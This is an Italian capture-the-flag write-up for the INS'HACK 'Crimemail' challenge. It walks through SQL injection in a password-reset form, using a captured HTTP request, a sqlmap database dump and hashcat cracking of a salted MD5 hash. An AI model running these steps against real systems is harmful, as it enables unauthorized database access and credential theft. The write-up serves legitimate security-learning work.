Crimemail – INS’HACK

collegandoci all’indirizzo https://crimemail.ctf.insecurity-insa.fr/ notiamo subito un form di login apparentemente inutile, cazzeggiando un po’ all’interno del sito vediamo che c’è la page per richiedere una nuova password.

Notiamo che mettendo un apice all’interno del parametro ci restituisce un errore sql

Prendendo la richiesta con burpsuite e sostituendo il parametro username con *(l’asterisco serve per indicare a sqlmap il parametro da testare)

POST /hint.php HTTP/1.1
Host: crimemail.ctf.insecurity-insa.fr
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://crimemail.ctf.insecurity-insa.fr/forgot.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Cookie: PHPSESSID=q1nlcr2k5prup8qcedqp5fmdk7
Connection: close
Upgrade-Insecure-Requests: 1

username=*

Poi lanciando da terminale

sqlmap -r req.req -D db –dump

otterremo

INS’HACK dava a tutti i soi partecipanti un’indizio, la password era formata da md5($password + $salt)

Quindi conoscendo l’hash e il salt bastava aggiungere un file con all’interno hash:salt, nel notro caso

f2b31b3a7a7c41093321d0c98c37f5ad:yhbG

e utilizzando hashcat possiamo vedere la password decriptata

hashcat -a 0 -m 10 <file_creato_prima> /usr/share/wordlists/rockyou.txt –force –show

Nel nostro caso la password era pizza

Loggandoci con le credenziali appena ottenute troveremo la nostra flag

INSA{s3cr3t_l0cat10n}

Categorie: CTF

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *